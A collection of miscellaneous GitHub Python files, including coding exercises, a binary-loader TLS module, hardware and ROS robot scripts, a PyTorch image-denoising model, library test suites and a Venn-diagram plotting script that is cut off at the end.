+{"seq_id":"29119733349","text":"#Question: easy\n#Given an array nums of integers, return how many of them contain an even number of digits.\nfrom typing import List\n\n\nclass Solution:\n def findNumbers(self, nums: List[int]) -> int:\n number_even = 0\n for number in nums:\n if number // 10:\n if number % 2 == 0:\n number_even += 1\n return number_even\n\n\nnums = [12, 345, 2, 6, 7896]\nresult = Solution()\nNumber_ofeven = result.findNumbers(nums)\nprint('Number of even number:', Number_ofeven)","repo_name":"kerncl/leetcode","sub_path":"python/easy/find_number_with_even_digits.py","file_name":"find_number_with_even_digits.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27314415050","text":"from .. import Backend\nfrom ...memory import Clemory\nfrom ...errors import CLEError\n\nclass TLSObject(Backend):\n \"\"\"\n CLE implements thread-local storage by treating the TLS region as another object to be loaded. Because of the\n complex interactions between TLS and all the other objects that can be loaded into memory, each TLS object will\n perform some basic initialization when instantiated, and then once all other objects have been loaded,\n ``map_object()`` is called to actually put each object's image into memory.\n \"\"\"\n def __init__(self, loader, max_modules=256):\n super(TLSObject, self).__init__('cle##tls', loader=loader)\n self.arch = self.loader.main_object.arch\n self.memory = Clemory(self.arch)\n self.modules = []\n self.pic = True\n self.next_module_id = 0\n self.tp_offset = 0\n self.max_modules = max_modules\n\n def register_object(self, obj):\n \"\"\"\n Assign some thread-local identifiers to the module (object). Do the heavy lifting in a subclass.\n \"\"\"\n if len(self.modules) >= self.max_modules:\n raise CLEError(\"Too many loaded modules for TLS to handle... file this as a bug\")\n obj.tls_module_id = self.next_module_id\n self.next_module_id += 1\n\n self.modules.append(obj)\n\n def map_object(self, obj):\n # Grab the init images and map them into memory\n data = obj.memory.load(obj.tls_data_start, obj.tls_data_size).ljust(obj.tls_block_size, b'\\0')\n self.memory.add_backer(self.tp_offset + obj.tls_block_offset, data)\n\n def rebase(self):\n # this isn't the dependency of anything so we need to run our relocations ourselves\n for reloc in self.relocs:\n reloc.relocate()\n\nclass InternalTLSRelocation(object):\n def __init__(self, val, offset, owner):\n self.val = val\n self.offset = offset\n self.owner = owner\n self.symbol = None\n\n def relocate(self):\n self.owner.memory.pack_word(self.offset, self.val + self.owner.mapped_base)\n\nfrom .elf_tls import ELFTLSObject\nfrom .pe_tls import PETLSObject\n","repo_name":"stefanberg96/SMArTCAT","sub_path":"latestversion/lib/python3.7/site-packages/cle/backends/tls/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"72300518940","text":"import rumps\nfrom CheckFilesFrame import DocFree, Create\nfrom multiprocessing import Process\nimport tkinter.ttk as ttk\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom InspectionRealTime import CheckDocument\n\nclass AwesomeStatusBarApp(rumps.App):\n\n def create(self):\n Create()\n\n @rumps.clicked(\"설명\")\n def prefs(self, _):\n rumps.alert(\"jk! no preferences available!\")\n\n @rumps.clicked(\"옵션\")\n def onoff(self, sender):\n sender.state = not sender.state\n \n @rumps.clicked(\"파일 검사\")\n def Diagnose(self, _):\n th3 = Process(target=Create)\n th3.start()\n th3.join()\n\n @rumps.timer(3)\n def NowPrice(self, _):\n A = CheckDocument()\n if A != None:\n print(A)\n rumps.notification(\"경고\", \"문서감지\", f\"{A}, 경로에서 문서가 감지되었습니다\")\n\nif __name__ == \"__main__\":\n AwesomeStatusBarApp(\"Awesome App\").run()\n","repo_name":"cothi/vaccine","sub_path":"MacOS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25039506379","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport yaml\nimport zipfile as zf\n\n\ndef get_root_path():\n ROOT_DIR = 'dashboard_sample'\n return re.sub(f'{ROOT_DIR}.*', ROOT_DIR, os.path.abspath('.'))\n\n\ndef get_paths():\n root_path = get_root_path()\n with open(f'{root_path}/src/path.yaml', 'r') as f:\n path_dict = yaml.safe_load(f)\n\n for key in path_dict:\n path = path_dict[key]\n path_dict[key] = f'{root_path}/{path}'\n return path_dict\n\n\ndef unzip(fname, output_path):\n with zf.ZipFile(fname) as z:\n z.extractall(output_path)\n","repo_name":"t-akaike/dashboard_sample","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1875060842","text":"import Speech\nfrom PyObjCTools.TestSupport import TestCase, min_os_level, min_sdk_level\nimport objc\n\n\nclass TestSFSpeechRecognizerHelper(Speech.NSObject):\n def speechRecognizer_availabilityDidChange_(self, a, b):\n pass\n\n\nclass TestSFSpeechRecognizer(TestCase):\n def test_enum_types(self):\n self.assertIsEnumType(Speech.SFSpeechRecognizerAuthorizationStatus)\n\n def test_constants(self):\n self.assertEqual(Speech.SFSpeechRecognizerAuthorizationStatusNotDetermined, 0)\n self.assertEqual(Speech.SFSpeechRecognizerAuthorizationStatusDenied, 1)\n self.assertEqual(Speech.SFSpeechRecognizerAuthorizationStatusRestricted, 2)\n self.assertEqual(Speech.SFSpeechRecognizerAuthorizationStatusAuthorized, 3)\n\n @min_sdk_level(\"10.15\")\n def test_protocols(self):\n self.assertProtocolExists(\"SFSpeechRecognizerDelegate\")\n\n def test_methods(self):\n self.assertArgIsBOOL(\n TestSFSpeechRecognizerHelper.speechRecognizer_availabilityDidChange_, 1\n )\n\n @min_os_level(\"10.15\")\n def test_methods10_15(self):\n self.assertArgIsBlock(\n Speech.SFSpeechRecognizer.requestAuthorization_, 0, b\"v\" + objc._C_NSInteger\n )\n\n self.assertResultIsBOOL(Speech.SFSpeechRecognizer.isAvailable)\n\n self.assertArgIsBlock(\n Speech.SFSpeechRecognizer.recognitionTaskWithRequest_resultHandler_,\n 1,\n b\"v@@\",\n )\n","repo_name":"ronaldoussoren/pyobjc","sub_path":"pyobjc-framework-Speech/PyObjCTest/test_sfspeechrecognizer.py","file_name":"test_sfspeechrecognizer.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":439,"dataset":"github-code","pt":"69"}
+{"seq_id":"40565677849","text":"#!/usr/bin/python3\n# -*- encoding: utf-8 -*-\n\nimport time, datetime\nimport RPi.GPIO as GPIO\n\nclass Stepper():\n\n def __init__(self):\n self.pinlist = [6,13,19]\n self.enpin = 6\n self.dirpin = 13\n self.steppin = 19\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n for x in self.pinlist:\n GPIO.setup(x,GPIO.OUT)\n for x in self.pinlist:\n GPIO.output(x,GPIO.LOW)\n\n def step(self, revs, rotation=0, speed=1):\n x = 0\n steps = revs*3200\n GPIO.output(self.enpin, GPIO.HIGH)\n if rotation == 0:\n GPIO.output(self.dirpin, GPIO.LOW)\n else: GPIO.output(self.dirpin, GPIO.HIGH)\n while x < steps:\n x += 1\n GPIO.output(self.steppin, GPIO.HIGH)\n time.sleep(.000001/speed)\n GPIO.output(self.steppin, GPIO.LOW)\n time.sleep(.000001/speed)\n GPIO.output(self.enpin, GPIO.LOW)\n\nif __name__==\"__main__\":\n step = Stepper()\n step.step(2,1,1)\n GPIO.cleanup()\n#140 steps 0 dir Station 1 to Station 2\n#140 steps 1 dir Station 2 to Station 1\n#271 steps 1 dir Station 3 to Station 1\n#131 steps 1 dir Station 3 to Station 2\n#268 steps 0 dir Station 1 to Station 3 then homing()\n#128 steps 0 dir Station 2 to Station 3 then homing()\n","repo_name":"gauthimd/AcidDipTest","sub_path":"motordriver.py","file_name":"motordriver.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5771940164","text":"#!/usr/bin/env python\n\n# Starter Code for New PA2\n# Based on code from August Soderberg\nimport rospy\n\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom sensor_msgs.msg import LaserScan\nimport numpy as np\n\ndef scan_cb(msg):\n global ranges\n ranges = np.array(msg.ranges)\n\ndef odom_cb(msg):\n global pose\n pose = msg.pose\n\n#Set up node and pubs/subs\n\nrospy.init_node('pilot')\nscan_sub = rospy.Subscriber('/scan', LaserScan, scan_cb)\nodom_sub = rospy.Subscriber('/odom', Odometry, odom_cb)\npub = rospy.Publisher('cmd_vel', Twist, queue_size = 1)\n\npose = None\nrate = rospy.Rate(2)\n\nstart_time = rospy.Time.now()\nwhile pose == None:\n print(\"Waiting for simulated robot\")\n\nstart_pose = pose\n\nwhile not rospy.is_shutdown():\n if rospy.Time.now() - start_time < rospy.Duration(secs=30):\n print(pose.pose.position.x)\n print(\">>>>>>>>>>> roomba is vaccuming\")\n else:\n print(\"<<<<<<<<<< roomba returns to start\")\n break\n rate.sleep()\n","repo_name":"campusrover/prrexamples","sub_path":"src/pa_starters/roomba_starter.py","file_name":"roomba_starter.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"29619191033","text":"import pandas as pd\n\ncdf = pd.read_csv('./data/Day6_cdf.csv', header = None, skip_blank_lines = False, sep = '\\r\\t')\ncdf = cdf[0].values\n\ncdf_total = set()\ncdf_count = 0\n\ntotal_sum = 0\n\nfor i in cdf:\n if not isinstance(i, str):\n total_sum += len(cdf_total)\n cdf_total = set()\n else:\n cdf_total.update(list(i))\n \ntotal_sum += len(cdf_total)\nprint(total_sum)\n\n###############################################\n#PART 2\n###############################################\ncdf_all_yes = set()\ncdf_temp = set()\ntotal_yes_sum = 0\nnewgroup = True\n\nfor i in cdf:\n if not isinstance(i, str):\n total_yes_sum += len(cdf_all_yes)\n cdf_all_yes = set()\n newgroup = True\n elif newgroup:\n cdf_all_yes.update(list(i))\n newgroup = False\n \n else:\n cdf_temp.update(list(i))\n cdf_all_yes = cdf_all_yes.intersection(cdf_temp)\n cdf_temp = set()\n \ntotal_yes_sum += len(cdf_all_yes)\nprint(total_yes_sum)\n","repo_name":"acalver/AoC2020","sub_path":"Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29688778517","text":"import random\n\na = []\nfor k in range(6):\n a.append(random.randint(0, 100))\n# 利用random.randint(0, 100)生成一个0~100的20位随机数列\nprint(a)\n\n\ndef BinaryInsertSort(l):\n for i in range(1, len(l)): # i从1开始增加遍历,直到i temp:\n high = mid - 1\n else:\n low = mid + 1\n\n for j in range(i-1, high, -1): # 进行插入,插入位置是high+1\n l[j + 1] = l[j]\n l[high+1] = temp\n\n return l\n\n\nb = BinaryInsertSort(a)\nprint(b)\n","repo_name":"LW-YUNKAI/MyCode","sub_path":"Python/Algorithm/SortAlgorithm/BinaryInsertSort.py","file_name":"BinaryInsertSort.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"12093491277","text":"import os\nfrom contextlib import contextmanager\n\ndef test1(cd):\n before = os.getcwd()\n with cd('/'):\n inner = os.getcwd()\n after = os.getcwd()\n assert before == after != inner\n\n\ndef test2(cd):\n before = os.getcwd()\n try:\n with cd('/'):\n inner = os.getcwd()\n 1/0\n except ZeroDivisionError:\n error = os.getcwd()\n after = os.getcwd()\n assert before == after == error != inner\n\n\nclass cd:\n\n def __init__(self, path):\n self.path = path\n self.old = os.getcwd()\n\n def __enter__(self):\n os.chdir(self.path)\n\n def __exit__(self, exc_type, exc_value, traceback):\n os.chdir(self.old)\n\ntest1(cd)\ntest2(cd)\n\n\n@contextmanager\ndef cd(path):\n old = os.getcwd()\n os.chdir(path)\n try:\n yield\n finally:\n os.chdir(old)\n\ntest1(cd)\ntest2(cd)\n","repo_name":"huanghao/learning-python","sub_path":"chapter07/cd.py","file_name":"cd.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"72262423261","text":"# Python Version: 3.9.1\n# Author: Lyman McBride\n#\n# Purpose: Student Tracking System. Similar to the phonebook project,\n# but self produced. Requirements are outlined, but \n# no code is provided.\n\nimport tkinter as tk\nfrom tkinter import *\nimport functions\nimport gui\n\nclass ParentWindow(Frame):\n def __init__(self, master, *args, **kwargs):\n Frame.__init__(self, master, *args,**kwargs)\n\n self.master = master\n self.master.minsize(500,370)\n functions.center_window(self,500,370)\n self.master.title(\"Student Tracking\")\n self.master.configure(bg='#99e6ff')\n self.master.protocol(\"WM_DELETE_WINDOW\", lambda: functions.ask_quit(self))\n\n gui.load_gui(self)\n\nif __name__ == \"__main__\":\n root=tk.Tk()\n App = ParentWindow(root)\n root.mainloop()","repo_name":"lymanmcbride/tech-academy-python-projects","sub_path":"Student_Tracking_System/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12646883515","text":"def get_unique_items_in_first_compartment(bag):\n items_in_first_compartment = []\n print(bag)\n print(len(bag))\n print(range(int(len(bag) / 2)))\n for l in range(int(len(bag) / 2)):\n items_in_first_compartment += bag[l]\n #sample_set = set(sample_list)\n unique_items_in_first_compartment = set(items_in_first_compartment)\n return unique_items_in_first_compartment\n\ndef get_unique_items_in_second_compartment(bag):\n items_in_second_compartment = []\n l = int(len(bag) / 2)\n while l < len(bag) - 1:\n items_in_second_compartment += bag[l]\n l += 1\n #sample_set = set(sample_list)\n unique_items_in_second_compartment = set(items_in_second_compartment)\n return unique_items_in_second_compartment\n\ndef to_priorities(set_):\n answer = []\n for l in set_:\n #print('to_p\\n' + str(ord(l)))\n l_asci = ord(l)\n if l_asci < 91: #Upper case. A is 65 and should be 27.\n l_asci -= (65-27)\n else: #lower case. a is 97 and should be 1\n l_asci -= (97-1)\n answer.append(l_asci)\n return answer\n\nFile_object = open(\"input\", \"r\")\nfile = File_object.readlines() #['GwrhJPDJCZFRcwfZWV\\n', 'LjnQlqNpjjmpmQlLlqNfZRvQcTWcTSTTZcSQcZ\\n',\nprint(file)\n\nlist_of_items_in_both_compartments_in_a_bag = [] #always only one\nfor i in file: #aJrwpWtwJgWrhcsFMMfFFhFp\n found = False\n unique_items_in_first_compartment = get_unique_items_in_first_compartment(i)\n unique_items_in_second_compartment = get_unique_items_in_second_compartment(i)\n for j in unique_items_in_first_compartment:\n for k in unique_items_in_second_compartment:\n if j == k:\n list_of_items_in_both_compartments_in_a_bag.append(j)\n found = True\n break\n if found:\n break\nlist_of_items_in_both_compartments_in_a_bag_s_priorities = to_priorities(list_of_items_in_both_compartments_in_a_bag)\nprint(\"here:\")\nprint(list_of_items_in_both_compartments_in_a_bag)\nprint(list_of_items_in_both_compartments_in_a_bag_s_priorities)\ntest_list = [2, 4]\nprint(sum(list_of_items_in_both_compartments_in_a_bag_s_priorities))\n# 157 too low\n\n\n\n","repo_name":"TailsTyler/calculator-challenge","sub_path":"Advent-of-code-2/3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37542975960","text":"# =============================================================================\n# coded by https://github.com/Whiax/\n# - citation is required if you reuse large parts of this code\n# =============================================================================\nfrom torchvision.transforms import Normalize\nfrom torch.utils.data import Dataset\nimport matplotlib.pyplot as plt\nfrom os.path import join\nimport torch.nn as nn\nimport numpy as np\nimport torch\nimport pickle\nimport math\nimport datetime\n\n# =============================================================================\n# Dataset\n# =============================================================================\n# ImageNet \nclass ImageNoiseDataset(Dataset):\n def __init__(self, imgs, transforms):\n self.imgs = imgs\n self.transforms = transforms\n \n def __len__(self): return len(self.imgs)\n \n def __getitem__(self, idx):\n dataset=self\n item = {}\n image = dataset.imgs[idx] / 255\n image = dataset.transforms(image)\n noise = torch.rand(image.shape)\n item['image'] = image\n item['noise'] = noise\n return item\n\n# =============================================================================\n# Model\n# =============================================================================\n# https://arxiv.org/abs/1910.03151 / https://github.com/BangguWu/ECANet\nclass EcaModule(nn.Module):\n def __init__(self, channels=None, kernel_size=3, gamma=2, beta=1):\n super(EcaModule, self).__init__()\n assert kernel_size % 2 == 1\n if channels is not None:\n t = int(abs(math.log(channels, 2) + beta) / gamma)\n kernel_size = max(t if t % 2 else t + 1, 3)\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.conv = nn.Conv1d(1, 1, kernel_size=kernel_size, padding=(kernel_size - 1) // 2, bias=False)\n def forward(self, x):\n y = self.avg_pool(x)\n y = y.view(x.shape[0], 1, -1)\n y = self.conv(y)\n y = y.view(x.shape[0], -1, 1, 1).sigmoid()\n return x * y.expand_as(x)\n#whiax\ndef Conv2d(*args, **kwargs):\n args = [int(a) if type(a) != tuple else a for i,a in enumerate(args) if i < 6]\n if not 'padding' in kwargs:\n k = args[2] if len(args) > 2 else (kwargs['kernel_size'] if 'kernel_size' in kwargs else kwargs['k'])\n k = (k,k) if type(k) != tuple else k\n pad = ((k[0] - 1) // 2,(k[1] - 1) // 2)\n kwargs['padding'] = pad\n return nn.Conv2d(*args, **kwargs, **{'padding_mode':'zeros'})\nclass convolution(nn.Module):\n def __init__(self, inp_dim, out_dim, k=3, stride=1, groups=1, bn=True, act=True, dilation=1, bias=True, **kwargs):\n super(convolution, self).__init__()\n self.conv = Conv2d(inp_dim, out_dim, k, stride=(stride, stride), bias=not bn and bias, groups=groups, dilation=dilation, **kwargs)\n self.bn = nn.BatchNorm2d(out_dim) if bn else nn.Identity()\n self.activation = nn.ReLU(True) if act else nn.Identity()\n def forward(self, x):\n out = self.conv(x)\n out = self.bn(out)\n out = self.activation(out)\n return out\nclass convolution_att(convolution):\n def __init__(self, inp_dim, out_dim, k=3, stride=1, groups=1, bn=True, act=True, dilation=1, attention='eca'):\n super(convolution_att, self).__init__(inp_dim, out_dim, k, stride, groups, bn, act, dilation)\n self.attention = EcaModule(out_dim)\n def forward(self, x):\n out = super().forward(x)\n out = self.attention(out)\n return out\n\n\n#denoiser / whiax\nclass DenoiserModel(nn.Module):\n def __init__(self, f=44, depth_start_mult=2, depth_mult=2, depth=3, downsample2in1=[1], layconv=convolution_att):\n super().__init__()\n model=self\n \n fs = [f] \n curmult = depth_start_mult\n for i in range(1, depth+1):\n fs += [f*int(curmult)]\n curmult *= depth_mult\n model.upsample = nn.Upsample(scale_factor=2)\n \n #head\n model.layer_base = nn.Sequential(*[layconv(3, f, 3, 1)])\n #down\n model.layers_downsample = nn.ModuleList()\n for i in range(1, depth+1):\n if not i in downsample2in1:\n model.layers_downsample += [nn.Sequential(*[\n layconv(fs[i-1], fs[i], 3, 1),\n layconv(fs[i], fs[i], 3, 2) ])]\n else:\n model.layers_downsample += [nn.Sequential(*[\n layconv(fs[i-1], fs[i], 3, 2) ])]\n #att\n model.fcatt = nn.Sequential(*[\n nn.Linear(fs[-1], fs[-1]),\n nn.Sigmoid()])\n #up\n model.layers_upsample = nn.ModuleList()\n for _i in range(0, depth):\n i = -_i-1\n l = nn.ModuleList()\n l += [layconv(fs[i], fs[i], 3, 1)]\n l += [layconv(fs[i], fs[i-1], 1, 1)]\n model.layers_upsample += [l]\n model.layer_tail = nn.Sequential(*[layconv(f, 8, 3, 1), convolution_att(8, 3, 1, 1, bn=False, act=False)])\n # initialize_weights(self)\n \n #forward mod\n def forward(self, x):\n model=self\n if len(x.shape) == 3: x=x.view([1,*x.shape])\n base_x = x = model.layer_base(x)\n xdi0 = []\n for lay in model.layers_downsample:\n x = lay(x)\n xdi0 += [x]\n x = xdi0[-1] * model.fcatt(xdi0[-1].mean([2,3])).view([xdi0[-1].shape[0], xdi0[-1].shape[1], 1, 1])\n for i, lays in enumerate(model.layers_upsample):\n x = xdi0[-(i+1)] + lays[0](x)\n x = lays[1](x)\n x = model.upsample(x)\n x = base_x + x\n x = model.layer_tail(x)\n x = x.clip(0,1)\n return x\n\n# =============================================================================\n# Methods\n# =============================================================================\n#pytorch channel first to np channel last\ndef pt_to_np(tensor):\n return np.ascontiguousarray(tensor.permute(1,2,0).numpy())\n \n#load object\ndef load_object(name, folder='.'):\n return pickle.load(open(join(folder, name + '.pickle'), 'rb'))\n\n#show pt tensor\ndef plt_imshow_pt(t):\n if 'cuda' in str(t.device):\n plt.imshow(pt_to_np(t.cpu()).astype(np.uint8))\n else:\n plt.imshow(pt_to_np(t).astype(np.uint8))\n\n#dict to plot\ndef plot_dict(d, l='', source=None, **kwargs):\n if source is None: source = plt\n if l != '':\n source.plot(d.keys(), d.values(), label=l, **kwargs)\n source.legend(loc=\"upper left\")\n else:\n source.plot(d.keys(), d.values(), **kwargs)\n\n#get batch\ndef get_batch(loader, loader_iter):\n try:\n batch = next(loader_iter)\n except StopIteration:\n loader_iter = iter(loader)\n batch = next(loader_iter)\n return batch, loader_iter\n\n#normalize img tensor\nnormalize_t = Normalize((0.4814, 0.4578, 0.4082), (0.2686, 0.2613, 0.2757))\n\n# Return a dated id for a file/folder\ndef get_id():\n date = datetime.datetime.now()\n return f'{date.year}_{date.month:02}_{date.day:02}_{date.hour:02}_{date.minute:02}_{date.second:02}'\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Whiax/denoising-image-generator","sub_path":"methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"32954790975","text":"import pytest\nfrom theano import theano, tensor as tt\n\nimport pymc3 as pm\nfrom pymc3.distributions import HalfCauchy, Normal, transforms\nfrom pymc3 import Potential, Deterministic\n\n\nclass NewModel(pm.Model):\n def __init__(self, name='', model=None):\n super(NewModel, self).__init__(name, model)\n assert pm.modelcontext(None) is self\n # 1) init variables with Var method\n self.Var('v1', pm.Normal.dist())\n self.v2 = pm.Normal('v2', mu=0, sd=1)\n # 2) Potentials and Deterministic variables with method too\n # be sure that names will not overlap with other same models\n pm.Deterministic('d', tt.constant(1))\n pm.Potential('p', tt.constant(1))\n\n\nclass DocstringModel(pm.Model):\n def __init__(self, mean=0, sd=1, name='', model=None):\n super(DocstringModel, self).__init__(name, model)\n self.Var('v1', Normal.dist(mu=mean, sd=sd))\n Normal('v2', mu=mean, sd=sd)\n Normal('v3', mu=mean, sd=HalfCauchy('sd', beta=10, testval=1.))\n Deterministic('v3_sq', self.v3 ** 2)\n Potential('p1', tt.constant(1))\n\n\nclass TestBaseModel(object):\n def test_setattr_properly_works(self):\n with pm.Model() as model:\n pm.Normal('v1')\n assert len(model.vars) == 1\n with pm.Model('sub') as submodel:\n submodel.Var('v1', pm.Normal.dist())\n assert hasattr(submodel, 'v1')\n assert len(submodel.vars) == 1\n assert len(model.vars) == 2\n with submodel:\n submodel.Var('v2', pm.Normal.dist())\n assert hasattr(submodel, 'v2')\n assert len(submodel.vars) == 2\n assert len(model.vars) == 3\n\n def test_context_passes_vars_to_parent_model(self):\n with pm.Model() as model:\n # a set of variables is created\n NewModel()\n # another set of variables are created but with prefix 'another'\n usermodel2 = NewModel(name='another')\n # you can enter in a context with submodel\n with usermodel2:\n usermodel2.Var('v3', pm.Normal.dist())\n pm.Normal('v4')\n # this variable is created in parent model too\n assert 'another_v2' in model.named_vars\n assert 'another_v3' in model.named_vars\n assert 'another_v3' in usermodel2.named_vars\n assert 'another_v4' in model.named_vars\n assert 'another_v4' in usermodel2.named_vars\n assert hasattr(usermodel2, 'v3')\n assert hasattr(usermodel2, 'v2')\n assert hasattr(usermodel2, 'v4')\n # When you create a class based model you should follow some rules\n with model:\n m = NewModel('one_more')\n assert m.d is model['one_more_d']\n assert m['d'] is model['one_more_d']\n assert m['one_more_d'] is model['one_more_d']\n\n\nclass TestNested(object):\n def test_nest_context_works(self):\n with pm.Model() as m:\n new = NewModel()\n with new:\n assert pm.modelcontext(None) is new\n assert pm.modelcontext(None) is m\n assert 'v1' in m.named_vars\n assert 'v2' in m.named_vars\n\n def test_named_context(self):\n with pm.Model() as m:\n NewModel(name='new')\n assert 'new_v1' in m.named_vars\n assert 'new_v2' in m.named_vars\n\n def test_docstring_example1(self):\n usage1 = DocstringModel()\n assert 'v1' in usage1.named_vars\n assert 'v2' in usage1.named_vars\n assert 'v3' in usage1.named_vars\n assert 'v3_sq' in usage1.named_vars\n assert len(usage1.potentials), 1\n\n def test_docstring_example2(self):\n with pm.Model() as model:\n DocstringModel(name='prefix')\n assert 'prefix_v1' in model.named_vars\n assert 'prefix_v2' in model.named_vars\n assert 'prefix_v3' in model.named_vars\n assert 'prefix_v3_sq' in model.named_vars\n assert len(model.potentials), 1\n\n def test_duplicates_detection(self):\n with pm.Model():\n DocstringModel(name='prefix')\n with pytest.raises(ValueError):\n DocstringModel(name='prefix')\n\n def test_model_root(self):\n with pm.Model() as model:\n assert model is model.root\n with pm.Model() as sub:\n assert model is sub.root\n\n\nclass TestObserved(object):\n def test_observed_rv_fail(self):\n with pytest.raises(TypeError):\n with pm.Model():\n x = Normal('x')\n Normal('n', observed=x)\n\n\nclass TestTheanoConfig(object):\n def test_set_testval_raise(self):\n with theano.configparser.change_flags(compute_test_value='off'):\n with pm.Model():\n assert theano.config.compute_test_value == 'raise'\n assert theano.config.compute_test_value == 'off'\n\n def test_nested(self):\n with theano.configparser.change_flags(compute_test_value='off'):\n with pm.Model(theano_config={'compute_test_value': 'ignore'}):\n assert theano.config.compute_test_value == 'ignore'\n with pm.Model(theano_config={'compute_test_value': 'warn'}):\n assert theano.config.compute_test_value == 'warn'\n assert theano.config.compute_test_value == 'ignore'\n assert theano.config.compute_test_value == 'off'\n\ndef test_duplicate_vars():\n with pytest.raises(ValueError) as err:\n with pm.Model():\n pm.Normal('a')\n pm.Normal('a')\n err.match('already exists')\n\n with pytest.raises(ValueError) as err:\n with pm.Model():\n pm.Normal('a')\n pm.Normal('a', transform=transforms.log)\n err.match('already exists')\n\n with pytest.raises(ValueError) as err:\n with pm.Model():\n a = pm.Normal('a')\n pm.Potential('a', a**2)\n err.match('already exists')\n\n with pytest.raises(ValueError) as err:\n with pm.Model():\n pm.Binomial('a', 10, .5)\n pm.Normal('a', transform=transforms.log)\n err.match('already exists')","repo_name":"RhDm/pymc3","sub_path":"pymc3/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"7621904336","text":"import pandas as pd\r\nimport numpy as np\r\nfrom matplotlib_venn import venn3\r\n#超市\r\ndata_dwj=pd.read_csv('dwj_f_seq_len_count.csv')\r\n#商友\r\ndata_sd=pd.read_csv('sd_f_seq_len_count.csv')\r\ndata_bc = pd.read_csv(\"bc_303592.csv\")\r\ndata_sly = pd.read_csv(\"sly_16553.csv\")\r\ndata_yimei = pd.read_csv(\"yimei_mapping_seq_len_count.csv\")\r\ndata_potato = pd.read_csv(\"potato_mapping_seq_len_count.csv\")\r\n# 百货\r\n# data_baihuo=data_shangyou.loc[(data_shangyou['课室']!='超级市场课')|(data_shangyou['课室']!='生活美食课')]\r\n#餐饮\r\n# data_canyin=data_shangyou.loc[(data_shangyou['课室']=='生活美食课')|(data_shangyou['部类']=='B2F小型餐厅')|\r\n# (data_shangyou['部类']=='小型餐厅')|(data_shangyou['部类']=='美食档口')|\r\n# (data_shangyou['部类']=='甜品烘焙')|(data_shangyou['部类']=='休闲食品')]\r\n#非可视化计算交叉情况\r\n# print('超市',len(set(data_chaoshi['会员卡号'])))\r\n# print('百货',len(set(data_baihuo['会员卡号'])))\r\n# print('餐饮',len(set(data_canyin['会员卡号'])))\r\n# print('超市&百货',len(set(data_chaoshi['会员卡号'])&set(data_baihuo['会员卡号'])))\r\n# print('超市&餐饮',len(set(data_chaoshi['会员卡号'])&set(data_canyin['会员卡号'])))\r\n# print('百货&餐饮',len(set(data_canyin['会员卡号'])&set(data_baihuo['会员卡号'])))\r\n# print('超市&百货&餐饮',len(set(data_chaoshi['会员卡号'])&set(data_baihuo['会员卡号'])&set(data_canyin['会员卡号'])))\r\n# print('仅超市',len(set(data_chaoshi['会员卡号'])-set(data_baihuo['会员卡号'])-set(data_canyin['会员卡号'])))\r\n# print('仅百货',len(set(data_baihuo['会员卡号'])-set(data_chaoshi['会员卡号'])-set(data_canyin['会员卡号'])))\r\n# print('仅餐饮',len(set(data_canyin['会员卡号'])-set(data_baihuo['会员卡号'])-set(data_chaoshi['会员卡号'])))\r\n\r\n#开始绘制文氏图\r\nimport matplotlib.pyplot as plt\r\n# 设置中文显示\r\nplt.rcParams['font.sans-serif']='SimHei'\r\nplt.rcParams['axes.unicode_minus']=False\r\n\r\n\r\n\r\n# 导入库,注意没有安装的要先pip install matplotlib-venn\r\n\r\n# sub接受一个set组成的列表,set_labels接受名称列表,其他参数自行去查看啦\r\n# venn3(subsets=[set(data_chaoshi['会员卡号']),set(data_baihuo['会员卡号']),set(data_canyin['会员卡号'])],set_labels=['超市','百货','餐饮'],)\r\n# plt.show()\r\n\r\n# 如果是画两个集合的韦恩图,就以下代码,其他不变\r\nfig, axs = plt.subplots(1,3, figsize=(18,6),dpi=300)\r\nfrom matplotlib_venn import venn2, venn2_circles\r\nfont1 = {'family': 'Times New Roman',\r\n 'weight': 'normal',\r\n 'size': 50,\r\n }\r\ng1=venn2(subsets=[set(data_dwj['seq']),set(data_sd['seq'])],\r\n set_labels=(\"Mo\",\"Os\"),\r\n set_colors=(\"blue\",\"red\"),\r\n 